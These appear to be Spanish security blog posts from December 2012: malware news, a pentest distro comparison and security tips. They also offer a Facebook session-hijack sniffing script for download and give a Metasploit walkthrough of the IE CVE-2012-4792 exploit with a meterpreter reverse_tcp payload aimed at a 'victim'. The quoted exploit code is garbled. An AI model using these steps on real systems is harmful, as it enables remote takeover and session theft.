Facebook Cookie / Session Hijack Script (secuestro de sesión) cada vez mas facil ..xD

diciembre 30, 2012

356-dangers-of-session-hijacking

Face Down | es una cookie Facebook / Sesión Hijack Script (sh) script que depende de dos bien conocidos sniffers (Ettercap) y (TShark) “la versión basada en la Terminal de (Wireshark)”, la tarea básica de que lo que hace es que  huela las cokies de todo el protocolo (HTTP) de toda la red.
Esta escritura fue hecha como POF (prueba de concepto) guión para el proyecto de la escuela.
TENGA EN CUENTA QUE:
Esta herramienta / script está destinado únicamente para fines educativos en el ordenador propio usuario / red / redes o computadoras que el usuario tiene permiso de su titular a utilizar la herramienta / script sucesivamente. El creador no asume ninguna responsabilidad por los daños causados ​​por el mal uso del software.

facebook_hijack

Puesdes bajarte la desde aki ..xD

Download


Un virus roba los datos de las tarjetas de crédito en los TPV

diciembre 30, 2012
 n-using-pos-2

Los sistemas de punto de venta (TPV) son el nuevo objetivo de los ciberdelicuentes, creando un virus que roba los números  y datos de las tarjetas de crédito de los clientes, que realicen un pago en un establecimiento dotado con uno de estos equipos, enviando todos los datos recopilados a un servidor controlado por sus creadores. Concretamente este nuevo ejemplar de malware se denomina Dextr.A y es tipo troyano, llegando a los sistemas por tres vías principales: a través de programas de intercambio de archivos P2P, visitando una página web maliciosa o mediante otro malware. Este nuevo virus afecta a todos los sistemas operativos de Microsoft desde su versión 2000 a Windows 7.

¿Cómo podemos evitar la infección por este u otro tipo de malware?

Para evitar ser infectado por un virus, troyano, spyware, keylogger, rootkit u otro tipo de malware, hay que tener el sistema operativo debidamente actualizado con todos sus parches al día, lógicamente lo mismo para el navegador y los programas de seguridad que tengamos instalados (lo recomendable es tener un buen antivirus o suite de seguridad y un programa antimalware para realizar escaneos manuales de forma periódica como por ejemplo Malwarebytes Antimalware o Superantisyware).

Pero lo fundamental principalmente es  tener precaución, evitando visitar páginas webs de dudosa procedencia (eludiendo sobre todo pulsar en ventanas emergentes), la utilización de programas de intercambio de archivos P2P, bittorrent o descarga directa para descargar keygens, parches y juegos, programas piratas y evitar abrir correos electrónicos sospechosos. Mantener un  buen hábito de navegación es la mejor protección y nos evitará muchos disgustos.


[CVE-2012-4792] Internet Explorer <= 8 Ejecución remota de código

diciembre 30, 2012

IE-bug

Está circulando una nueva Oday para Internet Explorer.
El primer ataque se llevó a cabo 07 de diciembre 2012.

Esta vulnerabilidad permite la ejecución remota de código en Internet Explorer versiones de los siguientes:

  • Internet Explorer 6
  • Internet Explorer 7
  • Internet Explorer 8

El exploit es muy extraño, sólo afecta a algunas personas:

  var h = navigator.systemLanguage.toLowerCase ();
 if (h! = "zh-CN" && h! = "en-US" && H! = "zh-TW" && H! = "ja" && H! = "ru" && h! = "ko")
 {
   location.href = "about: blank";
 }

Descripción de la hazaña:

Este módulo se aprovecha de una vulnerabilidad encontrada en Microsoft Internet Explorer. La
use-after-free condición se produce cuando un objeto es liberado por CDwnBindInfo
FollowHyperlink2, pero una referencia se mantiene en CDOC. Como resultado, cuando la referencia
se utiliza de nuevo durante una recarga de la página, una memoria no válida que se utiliza es controlable,
y permite la ejecución de código arbitrario en el contexto del usuario.
Nota: Esta vulnerabilidad ha sido explotada en los ataques salvajes
Principalmente China / Taiwan / y computadoras con sede en EEUU.

Metasploit salió para demostrar la hazaña.

Actualizamos metasploit:
sudo msfupdate
Comenzamos la consola:
sudo msfconsole

Buscar exploit:
search CDwnBindInfo

Vamos a hacer el nuestro -. –
use exploit/windows/browser/ie_cdwnbindinfo_uaf
set SRVHOST 192.168.178.26
Por lo general, establecer la carga útil: D
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

Enviamos a la víctima en la página infectada y auge 🙂

Pequeño vídeo de demostración:

Video demo

Bugtraq 2 beta vs Backtrack 5 r3 (La mejor distribución de pentest y forense) ??

diciembre 29, 2012

Bugtraq-2 Black Widow betascreenshot1220201202432

Características:
Bugtraq-2 es una distribución amplia, óptima y estable con administrador de servicios automatizados en tiempo real. Esta distribución está basada en el Kernel PAE 3.2 y 3.4 , además tiene una amplia gama de herramientas de pentesting, forense y laboratorio de malware. Bugtraq está disponible con XFCE, Gnome y KDE basada en Ubuntu, Debian y OpenSUSE. Los sistemas están disponibles en 12 idiomas diferentes.
El Bugtraq-Team no tiene límites, y piensan que cada usuario va a utilizar una distribución diferente por varias razones. Es por eso que el equipo quiso sorprendernos con este surtido de posibilidades para utilizar Bugtraq-2.

Herramientas:

Una de las novedades de bugtraq es su amplia gama de herramientas en diferentes ramas. Podemos encontrar herramientas forenses para móviles, laboratorios de pruebas de malware, herramientas de la comunidad de Bugtraq, herramientas de auditoría para GSM, Wifi, Bluetooth y RFID , herramientas de Windows integradas, herramientas centradas en pentesting ipv6 y típicas herramientas de pentesting y forense y que no deben faltar en Bugtraq- II.
Cada herramienta ejecuta todos los servicios que necesitan para funcionar y están configurados para un rendimiento óptimo. En el caso de las instalaciones, el equipo ha creado scripts que permiten un mejor manejo y rapidez en la instalación de ciertas herramientas como Nessus. Esto no sólo hace Bugtraq-2 como la única distribución con más herramientas de hacking hasta la fecha, Bugtraq-2 es un sistema rápido y dinámico que el que unos pocos clics se puede instalar o realizar todas las tareas que se requieran, sin tener que buscar en Internet tutoriales   de configuraciones y de cómo instalar las herramientas.

Version Black Widow beta …  2.8GB

Instalación:

Puede instalar nuestra distribución de un Live DVD o unidad USB. Dependiendo de su entorno de escritorio, las características son diferentes. Los requisitos mínimos se basan en XFCE.
• 1 GHz de procesador x86 y 512 MB de memoria de sistema (RAM)
• 15 GB de espacio en disco para la instalación

Web: http://www.bugtraq-team.com

NOTA: bugtraq es una comunidad sin patrocinio de ningun tipo …

 

BackTrack 5 R3 se centra en la corrección de errores.

BT5-R3-blog

Características:

Backtrack es una de las distribuciones Linux más populares utilizadas para Pruebas de Intrusión y Auditorías de Seguridad. El equipo de desarrollo Backtrack es patrocinado por Offensive Security. El 13 de agosto de 2012, Backtrack 5 R3 fue liberado.Kernel : 3.2.6

BackTrack – GNU / Linux LiveCD, que surgen como resultado de una fusión WHax y Recaudación de la Seguridad Auditor. El proyecto creó Mati Aharoni (Mati Aharoni) y Max Moser (Max Moser). Se utiliza principalmente para pruebas de seguridad. Linux-distro BackTrack se basa en Ubuntu Linux y incluye una amplia variedad de herramientas para el campo de la seguridad informática.

Herramientas:

Entre ellos, por ejemplo, Metasploit, Kismet, Nmap, Wireshark (antes – Ethereal) y Ophrack, así como una gran colección de varios exploits.etc.. (Bastantes errores por solucionar)

Version Rc3  3.4GB

Instalación:

• 1 GHz de procesador x86 y 512 MB de memoria de sistema (RAM)
• 15 GB de espacio en disco para la instalación

NOTA:Teniendo en cuenta, que Offensive Security ayuda el equipo de BackTrack con la financiación y recursos para hacer que todo esto suceda …

 

Conclusion

Despues de muchos años utilizando backtrack , casi todas las versiones 2/3/4/5

y valorar las herramientas que venian instaladas y bien configuradas en las primeras versiones , fueron desmejorando con el tienpo ,menos atencion

al configurar la distribuicion , muchos ejenplos os poderia dar …

me viene uno mui curioso a la cabeça , version 5 R1 ..WPSCAN.. curiosamente viene el script pero lo mejor es ke para ejecutarlo tienes ke ir al directorio y dar le permisos de ejecucion..

Nunca fue ejecutado (copiar , pegar) “sin testear” por ejenplo…

Y muchos mas problemas por el camino …

No dejo de ser una buena distro en su dia , pero com el passar del tienpo a decaido con herramientas /configuraciones /etc …  demasiados errores…

Teniendo patrocinadores y un equipo , no estan mejorando al contrario…

Bugtraq-Team es una pequeña comunidad de hackers nacionales en expancion..

La primera vez que utilize Bugtraq aun estaba en los primeros dias de vida pero ya aparentava (estabilidad y funcionalidad) y opcion de castellano me encanto (solo por comodidad ) xD

y ahora con esta version 2 Black widow (aun en beta)

Mui pocos errores encontrados , lo que es mui bueno , variedad de herramientas en muchas areas (funcionales) y bien configuradas , con varias herramientas unicas (mui interesantes)

Observando que es una distribuicion joven y va en su segunda version (tiene mucho potencial)..

Muchas pruebas de funcionamiento y utilidade de las dos distribuiciones de seguridad ,se han hecho …

La mas valorada y estable sin lugar a dudas en el mundo del PenTesting,  Bugtraq 2 black widow.


Android malware que pueda hacer ataques DDoS desde el teléfono …

diciembre 28, 2012

El ruso antivirus Doctor Web  ha encontrado un nuevo programa malicioso para Android que permite a los grupos de hackers para llevar a cabo ataques de denegación de servicio móvil. Si bien no está del todo claro cómo el troyano se propaga, los investigadores sospechan que los atacantes utilizan tácticas de ingeniería social, ya que el malware parece camuflarse como un clon de Google Play.

Este malware funciona en segundo plano sin que usted lo sepa. Una vez que se activa, busca para su centro de mando y control y envía información sobre su dispositivo allí. Una pieza de información que se envía es su número de teléfono. Los criminales van a utilizar este número para enviar mensajes de texto a su teléfono para controlar el malware.
Android Malware that can DDoS Attacks from your smartphone1
Apodado TheAndroid.DDoS.1.origin, crea un icono de aplicación, similar a la de Google Play. Si el usuario decide utilizar el icono falso para acceder a Google Play, la aplicación se iniciará.

Cuando se recibe una orden de ataque DDoS, el malware comienza a enviar paquetes de datos a la dirección especificada. “Las actividades del troyano puede disminuir el rendimiento del teléfono infectado y afectar el bienestar de su dueño, como el acceso a Internet y los SMS son servicios de pago. Caso de que el dispositivo envía mensajes a números de tarificación adicional, las actividades maliciosas le costará al usuario aún más . ” que dijo .
Me gustaría aconsejar a los lectores a sólo descargar aplicaciones Android de Android oficiales tiendas de aplicaciones como Google Play o la Appstore Amazon para Android, siempre verifique el número de descargas, número de aplicación y opiniones de los usuarios, revise cuidadosamente los permisos antes de descargar y / o instalar una aplicación .

Vulnerabilidades en controladores gráficos de AMD y NVIDIA

diciembre 27, 2012

nvidia_vs_amd

El malware siempre o casi siempre se desarrolla para afectar y propagarse en el mayor número de equipos posible, simple economía de escala. Explotar vulnerabilidades en los controladores de los dos mayores fabricantes de tarjetas gráficas, AMD y NVIDIA, es cuanto menos una buena idea para mentes cabales y malvadas.

Hace algo más de una semana, AMD alertaba de un fallo de seguridad en la funcionalidad de actualización automática de su centro de control Catalyst. El propio fabricante instaba a sus usuarios a desactivar la opción “Comprobar automáticamente actualizaciones” y a no recibir avisos de nuevos drivers, al menos hasta principios del 2013. Así que toca actualizar los drivers directamente desde el sitio web amd.com.

Si por el contrario utilizas NVIDIA pues la situación no es tampoco demasiado alentadora. Un tal Peter Winter-Smith (Pedro para los amigos) acaba de publicar otro exploit para un fallo en NVIDIA Display Device server (NVVSVC), el servicio de los drivers de pantalla de Windows, que podría permitir a un usuario local o remoto obtener privilegios de administrador mediante un desbordamiento de pila. Ya se avisó de un fallo similar en los drivers de Linux en agosto que permitía también escalar privilegios…

En conclusión, tened en cuenta estos vectores de ataque y a punto vuestros sistemas fortificados (firewalls locales, permisos, etc.). Que no os coja desprevenidos el año 2013 … xD


Seguridad Informática: Decálogo para evitar ataques informáticos

diciembre 20, 2012

Muchas veces se han difundido, pero nunca estará demás tener presente las 10 recomendaciones básicas para evitar ser víctimas de ataques informáticos.

 1-    No ingresar a enlaces sospechosos:

Evitar hacer clic en hipervínculos o enlaces de procedencia dudosa para prevenir el acceso a páginas web que posean amenazas informáticas. Recuerde que este tipo de enlaces pueden estar presentes en un correo electrónico, una ventana de chat o un mensaje en una red social.

 2-    No acceder a sitios web de dudosa reputación:

A través de técnicas de Ingeniería Social, muchos sitios web suelen promocionarse con datos que pueden llamar la atención del usuario – como descuentos en la compra de productos (o incluso ofrecimientos gratuitos), primicias o materiales exclusivos de noticias de actualidad, material multimedia, etc. Se recomienda estar atento a estos mensajes y evitar acceder a páginas web con estas características.

 3.      Actualizar el sistema operativo y aplicaciones:

se recomienda siempre mantener actualizados los últimos parches de seguridad y software del sistema operativo para evitar la propagación de amenazas a través de las vulnerabilidades que posea el sistema.

 4.      Aceptar sólo contactos conocidos:

Tanto en los clientes de mensajería instantánea como en redes sociales, es recomendable aceptar e interactuar sólo con contactos conocidos. De esta manera se evita acceder a los perfiles creados por los atacantes para comunicarse con las víctimas y exponerlas a diversas amenazas informáticas.

 5.      Descargar aplicaciones desde sitios web oficiales:

Es recomendable que al momento de descargar aplicaciones lo haga siempre desde las páginas web oficiales. Esto se debe a que muchos sitios simulan ofrecer programas populares que son alterados, modificados o suplantados por versiones que contienen algún tipo de malware y descargan el código malicioso al momento que el usuario lo instala en el sistema

 6.      Evitar la ejecución de archivos sospechosos:

la propagación de malware suele realizarse a través de archivos ejecutables. Es recomendable evitar la ejecución de archivos a menos que se conozca la seguridad del mismo y su procedencia sea confiable.

 7.      Utilizar tecnologías de seguridad:

Las soluciones antivirus, firewall y antispam representan las aplicaciones más importantes para la protección del equipo ante la principales amenazas que se propagan por Internet. Utilizar estas tecnologías disminuye el riesgo y exposición ante amenazas.

 8.      Evitar el ingreso de información personal en formularios dudosos:

Cuando el usuario se enfrente a un formulario web que contenga campos con información sensible (por ejemplo, usuario y contraseña), es recomendable verificar la legitimidad del sitio. Una buena estrategia es corroborar el dominio y la utilización del protocolo HTTPS para garantizar la confidencialidad de la información.

 9.      Tener precaución con los resultados arrojados por los buscadores web:

A través de técnicas de Black Hat SEO, los atacantes suelen posicionar sus sitios web entre los primeros lugares en los resultados de los buscadores, especialmente en los casos de búsquedas de palabras clave muy utilizadas por el público. Ante cualquiera de estas búsquedas, el usuario debe estar atento a los resultados y verificar a qué sitios web está siendo enlazado.

 10. Utilizar contraseñas fuertes:

Se recomienda la utilización de contraseñas fuertes, con distintos tipos de caracteres y una longitud no menor a los 8 caracteres.

Sin lugar a dudas las redes sociales son un valioso recurso para los internautas. Para usarlas con seguridad, es recomendable no subestimar a los delincuentes informáticos y aprender a hacer un uso correcto de herramientas tecnológicas, configurarlas de modo adecuado y hacer una navegación responsable.